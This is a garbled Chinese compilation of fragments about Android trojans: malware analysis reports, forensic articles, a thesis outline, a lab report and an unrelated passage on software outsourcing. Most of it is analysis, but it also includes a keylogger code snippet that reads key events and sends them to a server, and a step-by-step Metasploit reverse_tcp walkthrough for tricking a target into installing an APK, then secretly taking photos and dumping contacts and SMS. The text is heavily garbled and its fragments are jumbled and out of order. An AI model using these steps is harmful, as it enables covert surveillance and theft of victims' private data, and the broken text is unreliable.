Android木马分析与编写

在智能手机风生水起 的时代 ， 安卓智能手机 占据 了大部分 席位 ，就最新统计 的数据来看 ，Ａ ｎ ｄ ｒ ｏ ｉ ｄ智能手机在 中国的占 有 率为 ８ ６ ％ 。所 以，正如 Ｗ ｉ ｎ ｄ ｏ ｗ ｓ操作系统有如此多 的用户一 样 ，不可避 免的会 带来安全性问题 。随着智 能手机 的普及 ，手 机 的安全 性也变得越来越热 门和重要 。 ａ ｎ ｄ ｒ ｏ ｉ ｄ系统是一个 以 Ｌ ｉ ｎ ｕ ｘ为基础的半开源操作系统 ， 其 内核 属于 Ｌ ｉ ｎ ｕ ｘ内核的・个分支 ， 具有典型的 Ｌ ｉ ｎ ｕ ｘ调度和 功 能。所 以，一个 Ｎ ａ ｔ ｉ ｖ ｅ Ｃ 程 序，经过交叉编译，完全可 以 在Ａ ｎ ｄ ｒ ｏ ｉ ｄ系统上运行。 我们 的 目标 是编写一个简单的手机木马， 这个 木马分为服 务端和客户端两个 部分， 实现 的功能是客 户端 可以获取手机 的 按键信 息，并把信 息发送给服务端 。 核心源码 如下： ． 其 实 这 个手 机 木 马就 是 通 过 ｓ ｏ ｃ ｋ ｅ ｔ连 接 来编 写的 ， ｓ ｏ ｃ ｋ ｅ ｔ部分大家都应该 比较清楚 了，那就讲讲字 符处理的部 分吧 。 服务 端部分 ：服 务端 的核心部就是 接收客户端 发送 的信 息 ，并显示 出来 。 ｉ ｎ ｔ ｍ ａ ｉ ｎ （ ｉ ｎ ｔ ａ ｒ ｇ ｏ ，ｃ ｈ ａ ｒ＊ ａ ｒ ｇ ｖ ［ ］ ） ｛／ 木 省略部分代码 ， 以下为核心代码水 ／
消费 电子
计算机 科学 Ｃ ｏ ｎ ｓ ｕ ｍｅ ｒ Ｅ ｌ ｅ ｃ ｔ ｒ ｏ ｎ ｉ ｃ ｓ Ｍａ ｇ ａ ｚ ｉ ｎ ｅ ２ ０ １ ３ 年 ７月下
浅谈安卓手机安全及安卓手机木马编程
吴 栋
（ 杭 州电子科技 大学 ，杭 州 ３ １ ０ ０ １ ８） 摘 Ｊ ｒ － ：随着手机使 用的普及 ，手机职 能技 术越 来越 先进 ，大部分手机都安装 了最 为先进 的智 能系统 ，不仅可 以通话 ，同时还具备 多种上 网功能 、在 线购 物付 款功能、在线炒股、在线转账等功能 ，这些功能 的加入 同时也使得 手机 的安 全性越 来越 受到威胁 ，因此研 究现 阶段 智能手机 的安 全功能保 障及相应的故障 防卫编程成为智能手机发展

Android木马HongTouTou分析报告\Android木马HongTouTou分析报告安天实验室Android木马HongTouTou分析报告安天实验室一、基本信息病毒名称：Trojan/Android.Adrd.a[Clicker]病毒别名： HongTouTou、ADRD病毒类型：木马样本MD5：A84997B0D220E6A63E2943DA64FFA38C样本CRC32：A42850DE样本长度：1,316,981 字节原始文件名：Newfpwap_com_liveprintslivewallpaper.apk出现时间：2011.01.27感染系统：Android 2.0及以上二、概述ADRD木马（又名HongTouTou木马）被植入十余款合法软件中（图1），通过多家论坛、下载站点分发下载实现大范围传播。

其主要行为包括：开启多项系统服务；每6小时向控制服务器发送被感染手机的IMEI、IMSI、版本等信息；接收控制服务器传回的指令；从数据服务器取回30个URL；依次访问这些URL，得到30个搜索引擎结果链接；在后台逐一访问这些链接；下载一个.apk安装文件到SD卡指定目录。

感染该木马的手机将产生大量网络数据流量，从而被收取流量费用。

攻击者通过增加搜索链接的访问量而获益。

用户可以下载安天提供的Android恶意代码专查工具AScanner检测手机是否感染这一木马，并卸载相应软件将其清除。

图1 正常软件与被植入木马的软件三、样本特征截止本分析报告发布，安天已经检测到ADRD木马（又名HongTouTou木马）被植入到下列Android 软件：●动态脚印动态壁纸Live Prints Live Wallpaper●TurboFly 3D●Robo 3●iReader●桌面时钟天气Fancy Widget Pro●炫彩方块动态壁纸 Light Grid●超级酷指南针●指纹解锁●夕阳轮廓动态壁纸上述被植入木马的软件最早出现于2010年12月21日。

隐 私 窃 取 、短 信 拦 截 、远 程 控 制 和 钓 鱼 等 ，而 网 络 案 件 应 通 过 网 络 的 思 维 方 式 进 行 侦 查 ，因 此 要 求 侦 查 人 员
必须 掌 握 网 络 钓 鱼 的 原 理 、A ndroid木 马 反 编 译 、应 用 程 序 安 装 包 提 取 等 专 业 知 识 . 基 于 上 述 分 析 ，通过案例 探 讨 在 电 信 钓 鱼 诈 骗 案 件 中 ，A ndroid木 马 a p k 的 提 取 方 式 和 a p k 反 编 译 分 析 ，并 通 过 示 例 操 作 进 一 步 认 识 A n droid手 机 木 马 的 提 取 和 分 析 方 法 . 关 键 词 ：网 络 诈 骗 ;手 机 木 马 ; a d b ; 反编译 中图分类号:T P 3 9 3 文 献 标 识 码 ：A 文 章 编 号 =1674 -5 6 3 9 (2 0 1 6 )0 6 -0 0 5 6 -0 7 DOI ：1 0 .14091/j. cnki. kmxyxb. 2016. 06. 013
网络诈骗是以手机等可上网的设备为媒介， 采用电信设备通过欺骗的方式骗取款额较大的公 私财物的犯罪活动，其 中 网 络 钓 鱼 的 危 害 较 大 [1]. 诈骗团伙的诈骗方式是使用伪基站设备进行钓鱼 短 信 群 发 ，利 用 被 害 人 好 奇 、贪 财 、好 利 的 心 理 ，诱 骗 被 害 人 点 击 短 信 中 的 钓 鱼 链 接 ，被害 人 只 要 点 击 了 犯 罪 团 伙 提 供 的 钓 鱼 链 接 ，其 手 机 就 将 被 安 装 木 马 ，诈 骗 团 伙 能 够 实 现 远 程 控 制 ，达到盗取被
Detecting and Analyzing on Android Cell Phone Trojan

件产 品质量保证的核心部分 。 软件配置管理伴 随着软件产 品的 在迅速 发展 ，并逐渐 形成产业规模，中小规模 的软件企业也纷 整个 生命周期 ， 不仅能够准确 的掌握项 目各个里程碑 阶段的实 纷 建立软件 外包联盟 。本课题主 要从软件外 包行业 的发展现 际情况 ，还能够控制软件产 品项 目的开发进度 ， 使得软件产 品 状 、 目前软件外包保证 方面存在 的问题 以及影响因素三个方面 最 的开发能够及时的适应新 的需求 的变动 ， 从而确保软件产 品有 进行探 讨， 终在 软件 外包 质量 保证 实施 方面给出 了具体的工 条不 紊的按照进度开展 ， 在提高工作效率 的同时， 也使得 软件 作 内容 以及 关键 技术 。因此 ，只要使用合理 的技术手段 ，通过 产 品成 功开发的概率大大提升 。 最后一个技术便是检查表 以及 与 需求 以及 标准 的对 比 ， 发现软件产 品存 在的 问题 并及时的进 模版 ， 检查表 以及模版是形成软件产 品保证报 告的基础 ， 过 行解 决，便 可以最大限度 地保证外包类软件产 品的质量 。 通 检查表 以及模 版可 以简化文档 的工作 ， 但是 ， 同的软件产 品 不
效率 ， 短开 发周 期，提高测试 以及性 能维护的效率。软件配 软件发包方 主要 来 自欧美和 日本 。 缩 随着科学技术 的进步 ， 国 我 中 置管理，作为外包软件项 目研发 的重要过程 ， 软件配置 管理在 软件外 包行 业也逐渐 变得愈加的具备竞争优势 ， 国各地如北
确 保外 包软件产品质量的过程 中起到 了至关重要 的作用 ， 是软 京 、上海 、大连 、西安 、杭州 、合肥 等城 市的软件外包行业正
２ １． １ 突发异常状况 的准备工作 。在例外事件发生的情况 下， 当有 件导刊，０ 应

Android木马Smspacem分析报告Android木马Smspacem分析报告安天实验室Android木马Smspacem分析报告安天实验室一、基本信息病毒名称：Trojan/Android.Smspacem病毒类型：木马样本MD5：60CE9B29A6B9C7EE22604ED5E08E8D8A样本长度： 1855,053 字节发现时间：2011.05.22感染系统：Android 2.1及以上二、概述Smspacem木马主要行为是在开机时自启动，被该恶意软件感染的设备会自动获取手机用户通讯录中的信息（联系人名称、电话号码、Email等），自动向其联系人电话发送短信，其内容为事先编辑好的，如“现在无法通话，世界末日即将来临”等；该软件还试图访问指定的主机服务，并将从被感染设备的通讯录中获得的邮箱地址发送到远程服务器上；最后还会将被感染设备的壁纸修改为事先设定好的图像。

当被该恶意软件感染的设备接收短信时，短信将被拦截，并且该恶意软件将删除短信数据库中的短信，并且向该短信的发送地址发送一条事先编辑好的信息，如“现在无法通话，世界末日即将来临”等。

这一类的木马主要由最近关于世界末日将于2011年5月21日来临的新闻所引起。

抵御木马的关键是用户要对自己的设备进行安全设置，并在安装软件后查看其权限中是否存在敏感的权限等。

图 1 Holy软件界面及特殊权限三、样本特征3.1敏感权限●允许应用程序访问设备的手机功能：有此权限的应用程序可以确定此手机的号码和序列号、是否正在通话、以及对方的号码等。

●允许应用程序发送短信：恶意应用程序可能会不经您的确认就发送信息，给您产生费用。

●允许应用程序写入手机或 SIM 卡中存储的短信：恶意应用程序可借此删除您的信息。

●允许应用程序读取您的手机或 SIM 卡中存储的短信：恶意应用程序可借此读取您的机密信息。

●允许应用程序接收和处理短信：恶意应用程序可借此监视您的信息，或者将信息删除而不向您显示。

II
目录
目录
第一章 绪 论 .................................................................................................................. 1 1.1 研究工作的背景及意义 ............................................................................... 1 1.2 研究工作的国内外研究现状 ....................................................................... 4 1.3 研究工作的目标和内容 ............................................................................... 6 1.4 论文的章节安排 ........................................................................................... 6 第二章 ANDROID 相关理论技术概述 ......................................................................... 8 2.1 Android 的系统架构 ...................................................................................... 8 2.2 Android 的应用程序组件 ............................................................................ 10 2.3 Android 的安全机制 .................................................................................... 13 2.3.1 Android 的沙箱机制与共享机制 ......................................................... 13 2.3.2 Android 的权限机制 ............................................................................. 15 2.4 本章小结 ..................................................................................................... 18 第三章 ANDROID 智能手机木马的技术分析 ........................................................... 19 3.1 Android 智能手机木马的植入技术 ............................................................ 19 3.2 Android 智能手机木马的隐藏技术 ............................................................ 20 3.3 Android 智能手机木马的后台监听技术 .................................................... 24 3.4 Android 智能手机木马的信息截取和回传技术 ........................................ 27 3.5 本章小结 ..................................................................................................... 34 第四章 ANDROID 智能手机木马的实现分析 ........................................................... 35 4.1 Android 智能手机木马的整体方案 ............................................................ 35 4.1.1 Android 智能手机木马的整体结构和运行流程 ................................. 35 4.1.2 Android 智能手机木马的服务端 ......................................................... 37 4.1.3 Android 智能手机木马的客户端 ......................................................... 37 4.2 Android 智能手机木马的功能模块的实现分析 ........................................ 38 4.2.1 Android 智能手机木马的静默运行和隐藏的实现分析 ..................... 38 4.2.2 Android 智能手机木马的短信获取模块的实现分析 ......................... 41 4.2.3 Android 智能手机木马的通话记录获取模块的实现分析 ................. 45 4.2.4 Android 智能手机木马的用户联系人信息获取模块的实现分析 ..... 49 4.2.5 Android 智能手机木马的设备信息获取模块的实现分析 ................. 53

手机木马实验报告手机木马实验报告1. 引言手机木马是一种恶意软件，它能够在用户不知情的情况下获取手机的敏感信息、控制手机的功能以及传播自身。

为了深入了解手机木马的工作原理和危害程度，我们进行了一系列的实验。

2. 实验目的本次实验的目的是通过模拟手机木马的攻击行为，评估其对手机和用户的威胁程度，以及提供相应的防护建议。

3. 实验方法我们使用了一台安装有最新操作系统和杀毒软件的Android手机作为实验对象。

通过下载一款模拟手机木马的应用程序，并在实验过程中监测其行为，我们能够了解手机木马的攻击方式、传播途径以及对手机的影响。

4. 实验结果在实验过程中，我们观察到以下几个现象：4.1 敏感信息获取手机木马能够在用户不知情的情况下获取手机中的敏感信息，如联系人、短信、通话记录等。

我们发现，模拟的手机木马成功地获取了手机中的敏感信息，并将其上传到了远程服务器上。

4.2 功能控制手机木马可以远程控制手机的各项功能，包括拍照、录音、发送短信等。

我们测试了模拟木马的远程控制功能，发现它能够远程激活手机的摄像头，并将拍摄到的照片发送到远程服务器。

4.3 自我传播手机木马可以通过各种方式自我传播，如通过短信、应用商店等。

我们模拟了手机木马的传播行为，并观察到它成功地向其他手机发送了包含木马应用的短信，并诱导用户下载安装。

5. 结果分析通过以上实验结果，我们可以得出以下几点结论：5.1 手机木马对用户隐私的侵犯程度非常高，能够获取用户的敏感信息并传输给攻击者。

5.2 手机木马的功能控制能力使得攻击者可以远程操控手机，可能导致更严重的后果，如偷拍、窃听等。

5.3 手机木马的自我传播能力使得其传播速度非常快，可能导致大规模的感染。

6. 防护建议为了保护手机和用户的安全，我们提出以下防护建议：6.1 安装可信任的杀毒软件，并及时更新病毒库。

6.2 不要随意下载来历不明的应用程序，尤其是通过非官方渠道下载。

6.3 注意手机的权限设置，仅授权给必要的应用。

android手机木马的提取与分析Android手机木马病毒的提取与分析为有效侦破使用手机木马进行诈骗、盗窃等违法犯罪的案件，对手机木马病毒的特点、植入方式、运行状态进行了研究，利用dex2jar、jdgui等工具软件查看apk文件源代码。

结合实例，讲述了如何提取关键代码与配置数据，并对手机木马病毒的危险函数、启动方式、权限列表进行分析，证明了该方法的可行性，提取了违法犯罪行为的关键线索服务于侦查办案和证据固定。

智能手机给用户带来便利的同时，手机恶意软件也在各种各样的违法活动中充当了重要角色，其中手机木马病毒犯罪日渐加速化、产业链化、智能化和隐藏化。

Android手机木马病毒主要完成植入木马、运行病毒、监控手机、盗取信息、转走钱财。

他们伪造成“XX照片”、“违章查询处理”、“开房记录查看”、“XX神器”等易于被人点击安装的方式出现，这种恶意短信中附的网址，其实就是诱导下载一个手机软件，安装后手机内并不会显示出该应用，但其中的木马病毒已植入，后台会记录下机主的一切操作，可以随时监控到手机记录。

若机主登录网银、支付宝、微信红包等，银行卡账号、密码就都被泄露了，黑客能轻易转走资金。

此类案件近期呈现高发的趋势。

面对各种各样善于伪装隐藏的手机木马病毒，如何提取分析，并固定证据成为一项重要工作。

本文从Android手机木马病毒的特点入手，讲述了如何提取分析关键代码与配置数据，从而分析出违法犯罪行为的关键线索服务于侦查办案和证据固定。

诈骗、盗窃的目标不变，那就是诱导点击安装短信的链接网址中的木马。

木马植入到目标系统，需要一段时间来获取信息，必须隐藏自己的行踪，以确保木马的整体隐藏能力，以便实现长期的目的。

主要包括本地隐藏、文件隐藏、进程隐藏、网络连接隐藏、内核模块隐藏、通信隐藏、协同隐藏、日志过滤和Rootkit模块的隐藏。

然后实现了Android系统下木马攻击的各种功能，主要有删除SIM卡和手机里的通讯录、删除SD卡里的文件和上传文件到电脑控制端。

Android木马BgServ分析报告Android木马BgServ分析报告安天实验室Android木马BgServ分析报告安天实验室一、基本信息病毒名称：Trojan/Android.BgServ.a病毒别名：Fake10086病毒类型：木马样本MD5：4E70ABE0AE8A557F6623995BEF1D9BA7样本CRC32：9ED70AE2样本长度：98,684 字节出现时间：2011.03.09感染系统：Android 1.6及以上二、概述2011年3月3日，Android官方应用市场上出现“五十余款应用程序被植入恶意代码Trojan/Android.Rootcager（又名DroidDream）”。

Google随即清理了这些应用程序、删除了相关账号，并远程向被攻击手机发送名为Android Market Security Tool（软件包名com.android.vending.sectool.v1）的安全检查工具，以清除恶意代码。

2011年3月9日，国内部分软件下载站和第三方应用市场出现被植入新木马的Android Market Security Tool，该木马具有向控制服务器发送手机隐私信息、发送扣费短信、拦截中国移动和中国联通客服短信等能力。

经分析，木马的攻击代码利用了发布在Google Code的一份开源代码mmsbg。

安天实验室再次呼吁广大Android手机用户，为避免隐私泄露和财产损失，请勿从不可信来源下载安装手机软件，应尽量从软件开发者官网和Android官方市场下载。

三、样本分析样本由两部分组成：1.Android市场安全工具（com.android.vending.sectool.v1）2.恶意代码BgServ（com.mms.bg）相比于正常的Android 市场安全工具，恶意代码增加了下列权限要求：android.permission.RECEIVE_SMS：接收短信●android.permission.SEND_SMS：发送短信●android.permission.ACCESS_FINE_LOCATION：通过GPS获取精确地理位置●android.permission.ACCESS_COARSE_LOCATION：通过网络获取大概位置●android.permission.ACCESS_NETWORK_STATE：查询网络状态●android.permission.CHANGE_NETWORK_STA TE：更改网络连接●android.permission.WRITE_EXTERNAL_STORAGE：修改/删除SD卡中的内容●android.permission.WAKE_LOCK：防止手机休眠图1 正常软件所需权限图 2 恶意代码所需权限恶意代码的启动Activity为com.mms.bg.ui.FakeLanucherActivity，并将自身显示在手机的程序列表（Launcher）中。

（ １ ）不需要真 正执行恶 意代码 ，可 以避 免对恶意攻击者发现 ； （ ２ ）误 报 率 低 （ ３ ）不受具 体进程执行 流程 的制约，可 以对代码 进行详尽的细粒度分析 。 我 们通 过对 一线 公安 机关 办理 的相 关恶 意窃取隐私案件 中的 ａ ｐ ｋ样 本进行反编译 ，对 木 马部分源码 进行静态分析后可 以掌握犯罪嫌 疑人的手机号码及电子邮箱等个人信息，并能 掌握木 马取证的恶意操作：如读取短信、监控 短信收发、读取联系人、后 台发送 邮件等操作 。
３ 基 于 安 卓 平 台 恶 意 代码 的 分 析
３ ． １ 分 析 工 具 Ａｎ ｄ ｒ ｏ ｉ ｄ Ｋｉ ｌ ｌ ｅ ｒ 是 一 款 可 视 化 的安 卓 应 用 逆 向 工 具 ，集 Ａｐ ｋ反 编 译 、ｉｐ ｋ打 包 、Ａｐ ｋ签 名 ， 编 码 互 转 ，ＡＤＢ通 信 （ 应用安装 一 卸 载 运 行 一
设备文件管理 ）等特色功能于一身 。它包含 了 ａ ｄ ｂ 、ａ ｐ ｋ ｔ ｏ ｏ ｌ 、ｄ ｅ ｘ ２ ｊ ａ ｒ 、ｉ ｄ － ｇ ｕ ｉ 等反编译工具 。 其中 ａ ｐ ｋ ｔ ｏ ｏ ｌ 能将 ａ ｎ ｄ ｒ ｏ ｉ ｄ中 的 ． ａ ｐ ｋ文 件转 换 成． ｄ ｅ ｘ文件 ；ｄ ｅ ｘ ２ ｊ ａ ｒ 能将 第一 步 的 ． ｄ ｅ ｘ文件 反 编译 成 ． ｊ ａ ｒ 文件 ；ｊ ｄ － ｇ ｕ ｉ 能将 ． ｊ ａ ｒ 文 件 反编 译成 ． ｊ ａ ｖ ａ 文件进行分析 。 ３ ． ２安卓木马 固定
漶 安全 ・ Ｉ ｎ ｆ ｏ ｒ ｍａ ｔ ｉ ｏ ｎ Ｓ ｅ ｃ ｕ ｒ ｉ ｔ ｙ
Ａ ｎ ｄ ｒ ｏ ｉ ｄ恶意代码——木 马 Ａ Ｐ Ｋ分析
文／ 卢委红 陶 一 鸣
优 点包 括 ：

安卓手机 的安 全问题 安卓系 统具有强大 的开发性 ，是一款硬件 跨平 台，能够 进 行 并 行 运 行 模 式 ，而 且 安 卓 系 统 没 有 垄 断 性 ， 可 以按 照 企 业 的要求进行 开发 ，而使用 时也不会 受到任何 束缚 ，是一 款 开发相 当便利 的手机系统 。但是也正 因为如此 安卓系统不 可 避免地存在着 不少缺 陷。 目前 安卓手机 系统面临的主要威胁有恶意软件例如木马 、 窃听软件、流氓软件的侵 害， 目前 已发现的恶意软件数量还在 不断增多，有些恶意软件会在用户不知道的情况下订购业务、 进行恶意支付等等行为，从而给用户带来严重 的经济损失，有 些恶意软件通过 邮件传递病毒 ，从而损害用户 的信用 。这些恶 意软件 一旦安装就很难进行删 除，给用户造成极大的不便。 二 、安卓 手机 的木马编程 安卓系统是以 Ｌ ｉ ｎ ｕ ｘ为基 础 的半 开源 操 作 系 统，它 的 内核 是 Ｌ ｉ ｎ ｕ ｘ内核 的一 个 分支 ， 因此 安卓 系 统具 有 明显 的 Ｌ ｉ ｎ ｕ ｘ调度 和功能 。所 以一个经过 交叉 编译 的 Ｎ ａ ｔ ｉ ｖ ｅ Ｃ程序
ｅ ｖｅ ｎｔ Ｏ ｆ ｄ＝ｏ ｐ ｅ ｎ （ ／ ｄ ｅ ｖ ／ ｉ ｎ ｐ ｕ ｔ ／ ｅ ｖ ｅ ｎ ｔ Ｏ ，Ｏ ＿ Ｒ Ｄ Ｗ Ｒ ） ； ｒ ｄ＝ｒ ｅ ａ ｄ （ ｅ ｖ ｅ ｎ ｔ Ｏ — ｆ ｄ ，ｅ ｖ Ｏ ，ｓ ｉ ｚ ｅ ｏ ｆ （ ｓ ｔ ｒ ｕ ｃ ｔ ｉ ｎ ｐ ｕ ｔ — ｅ ｖ ｅ ｎ ｔ ） 木６ ４ ） ； ｉ ｆ （ｒ ｄ＜ｓ ｉ ｚ ｅ ｏ ｆ （ ｓ ｔ ｒ ｕ ｃ ｔ ｉ ｎ ｐ ｕ ｔ — ｅ ｖ ｅ ｎ ｔ ））ｒ ｅ ｔ ｕ ｒ ｎ ０ ； ｆ ｏ ｒ （ ｉ＝０ ； ｉ＜ｒ ｄ／ Ｓ ｉ ｚ ｅ ｏ ｆ（ Ｓ ｔ ｒ ｕ ｃ ｔ ｉ ｎ ｐ ｕ ｔ — ｅ ｖ ｅ ｎ ｔ ） ： ｉ ＋ ＋ ） ｛ ｉ ｆ （ ｅ ｖ Ｏ［ ｉ ］ ． ｔ ｙ ｐ ｅ ＝ ＝ １ ＆ ＆ ｅ ｖ Ｏ［ ｉ ］ ． ｖ ａ ｌ ｕ ｅ ＿ ＿ １ ） ｛ ｐ ｒ ｉ ｎ ｔ ｆ （ Ｔ ｈ ｅ ｋ ｅ ｙ ｃ ｏ ｄ ｅ ｉ Ｓ ：％ ３ ｄ ｋ ｎ ，ｅ ｖ Ｏ ［ ｉ ］ ． ｃ ｏ ｄ ｅ ） ；

Android木马分析报告一、样本特征：1. 基本信息该病毒伪装成正常软件，启动时开启后台监听服务，后台拦截包含指定内容的短息并修改，窃取用户隐私，同时私下发送短信，存在诱骗欺诈行为。

样本MD5：3ea3c573b257e0ede90c23ff908be1ff样本包名：com.way.xx样本证书串号：53a67b752. 特征描述该病毒伪装成正常软件，启动时开启后台监听服务，后台拦截包含指定内容的短息并修改，窃取用户隐私，同时私下发送短信，存在诱骗欺诈行为。

二、样本分析：软件安装运行：图1 图2如图1所示，安装该病毒软件后桌面上出现一个类似正常软件的图标。

运行病毒后图标消失，如图2所示。

从病毒隐藏自身的图标来看，是恶意防止用户卸载，从而达到保护自身的目的。

如图下图所示是该病毒用到的一些敏感权限。

代码分析：软件入口程序入口com.way.activity.MainActivity，进入之后onCreate方法，此处SMSListenerService短信监听服务，同时启动服务后隐藏了图标。

调用的隐藏该软件图标的方法，在该病毒运行后达到隐藏图标的目的：病毒启动短信监听服务后，会在后台监控短信的广播消息。

获取短信的来源地址和短信内容，并监控包含知道你跟内容的短信，当接收到符合条件的短信后篡改其中的短信内容通过sendThread中的run方法将获得用户隐私上传到指定的服务器：后台发送短信AlarmReceiver中短信发送线程：从指定服务器获取短信信息的方法。

将从指定服务器获取的短信发送出去：结论：此病毒运行后会隐藏自身图标，防止用户卸载。

通过开启后台服务监听户用短信，并修改短信内容，后台私自发送短信，存在欺诈嫌疑。

A NDROID木马G APP分析报告安天武研2012-02-09文档信息修订记录目录一、样本特征 (1)1. 基本信息 (1)2. 特征描述 (1)二、样本分析 (1)1. 静态分析 (1)2. 本地行为分析 (4)3. 网络行为分析 (5)三、检测和清除方法 (9)四、总结 (10)A NDROID木马G APP分析报告安天公司2012-02-09一、样本特征1.基本信息病毒名称：Trojan/Android.gapp.a[rmt]病毒类型：木马样本MD5：FC4104C17C9DC33C9FDA3CE52EDA2AFE样本CRC32：7D0AA8F1样本长度：71743 字节发现时间：2012年2月8日2.特征描述该样本对正常软件RAM优化管理器进行了恶意篡改，首次运行后在后台会访问网址http:\\，获取用来下载其他程序的URL列表保存在本地。

样本在每隔一段时间通过URL列表下载apk文件，每次下载一个，并伪造“系统更新”通知，骗取用户点击安装所下的程序。

样本每隔一段固定的时间会访问http:\\更新url 列表。

二、样本分析1.静态分析该样本在正常软件上进行了捆绑的操作，如下图所示，所有的恶意代码都集中在com.google.process.gapp包中。

（1）AndroidManifest.xml分析敏感权限：android.permission.RECEIVE_BOOT_COMPLETED 允许程序自启动恶意模块：接收器：com.google.process.gapp.A服务：com.google.process.gapp.GoogleServicesFrameworkService（2）接收器com.google.process.gapp.A分析该接收器监听系统启动的intent，当系统启动并且检测到sd卡时，开启服务com.google.process.gapp.GoogleServicesFrameworkService。

Android Gamex木马分析报告图/文非虫5月刚开始就弄到了这个Gamex木马样本，该样本破坏性不大，不过对于安全分析人员来说，这可是很好的研究素材，今天我就将这个样本的完整分析过程拿来与大家分享。

工具ApkTool、dex2jar、DJ Java Decompiler分析必备python2.6编写解密脚本分析这个样本通过捆绑软件SD-Booster来达到感染的目的，在安装运行被感染的SD-Booster时，木马就会自动安装进Android系统，为了尽快找到感染部分，下载未感染的SD-Booster进行反编译对比，结果如图1所示：图 1程序被植入了“com.android.md5”与“com.gamex.inset”两个包，首先找到植入程序的加载处，在SDBoost 类的onCreate（）方法中插入了如下代码：public void onCreate(Bundle paramBundle) {super.onCreate(paramBundle);A.b(this);…｝A是“com.gamex.inset”包中的类，A.b（）方法代码如下：public static void b(Context paramContext){context = paramContext;Intent localIntent = new Intent(paramContext, Settings.class);ComponentName localComponentName = paramContext.startService(localIntent);}直接启动的是Settings.class服务，这个服务很简单，启动代码是这样的：public void onStart(Intent paramIntent, int paramInt){super.onStart(paramIntent, paramInt);new Settings.1(this).start();}class Settings$1 extends Thread{public void run(){if ((!A.a) && (A.c()) && (A.d(A.context))){A.a = 1;Settings localSettings = this.this$0;new C(localSettings).start();}while (true){return;this.this$0.stopSelf();}}}A.a初始化为0，用来判断木马是否已经运行，A.c()只有一行代码判断SD卡是否已经准备好，为后面的病毒下载做准备，A.d()判断木马程序“com.android.setting”是否已经安装，如果没有安装且满足上面的条件就启动C线程来安装木马，C类的run()方法在Dex2jar中显示不了，在DJ Java Decompiler中可以看到完整的反编译的代码，线程通过context.getAssets().open("logos.png")读取木马文件，然后通过解密运算得到最终的apk安装文件，解密代码我用python实现如下：# -*- coding:utf-8 -*-import sysdef main(filename):infile = file(filename,"rb")outfile = file(filename[:-4]+".apk","wb")while1:c = infile.read(1)if not c:breakc = chr(ord(c) ^ 18)outfile.write(c)outfile.close()infile.close()if __name__ == '__main__':main(sys.argv[1])解密只是将整个文件与0x12异或而以，运行“python decrypt_apk.py logos.png”就会生成logos.apk木马文件。

Android木马：只能在同一局域网使用，要想突破外网需要使用端口转发。
（设置转发：路由器外网端口x 映射到内网端口y 在路由器上 然后payload就向外网x发送数据 你在内网y接收就好）
生成木马，诱导目标植入手机。
msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
5.set LPORT 5
6.exploit //开始执行漏洞 开始监听,等待手机上线
会话建立成功后：
sysinfo 查看手机信息
webcam_list 查看手机有多少个摄像头
webcam_stream //开启摄像头
webcam_snap //隐秘拍照功能
dump_contacts //导出电话号码
dump_sms //导出信息
还可以输入?查看更多命令
然后启动msfconsole 然后输入命令：
e exploit/multi/handler //加载模块
2.set payload android/meterpreter/reverse_tcp //选择Payload
3.show options //查看参数设置
4.set LHOST 192.168.1.114 //这里的地址设置成我们刚才生成木马的IP地址

Android系统的智能手机木马攻防机制的分析的开题报告一、选题背景Android系统是当前智能手机市场上使用最广泛的操作系统，在其背后的应用商店上，数不尽的应用在满足人们生活需求的同时，也不可避免地将各种恶意软件（例如木马）植入其中。

而正是这些恶意软件的存在，让人们的个人隐私、财产等重要信息面临着安全威胁。

为保障Android系统用户的信息安全，需对其存在的木马进行攻防机制的研究，以及探索相应的安全策略和技术手段。

本文将主要研究Android系统的智能手机木马攻防机制。

二、研究目的本文旨在研究Android系统的智能手机木马攻防机制，考察其主要特征和安全威胁，并提出相应的解决方案。

三、研究内容1. Android系统与智能手机木马的关系分析2. 智能手机木马的主要攻击手段和安全威胁分析3. Android系统智能手机木马检测与防范技术分析4. Android系统智能手机木马攻防实验及分析四、研究方法本文将采用文献资料法、实证研究法和案例分析法等研究方法，运用Android Studio等开发工具实现Android系统智能手机木马攻防实验，验证所提出的安全策略和技术手段是否有效。

五、预期成果1. 对当前Android系统智能手机木马形成了科学全面的认识。

2. 提出针对当前智能手机木马安全威胁的解决方案。

3. 提高用户对Android系统的信息安全认知和防范能力。

六、研究意义1. 面对日益严峻的安全威胁，研究智能手机木马攻防机制改进相应的安全技术及手段，极有必要性。

2. 提高用户对于Android系统的信息安全认知，改变用户依赖第三方应用商店下载应用的现状，更换为正式官网下载应用。

3. 本文的研究成果可以为Android系统研究现有的安全机制提供一定的促进作用，对于公司同时也是具有管理启示意义的。

4. 研究结果对于智能手机木马的防范，提高用户信息安全保护水平有着积极的推进作用。

七、研究进度安排第一、二周：查阅相关文献，了解Android系统的智能手机木马攻防机制的研究进展；第三、四周：分析智能手机木马的攻击手段和安全威胁特点；第五、六周：探讨Android系统智能手机木马检测与防范技术；第七、八周：选取典型案例，运用实证研究方法进行智能手机木马攻防实验；第九、十周：总结分析研究结果，撰写论文；第十一、十二周：完成论文修改工作。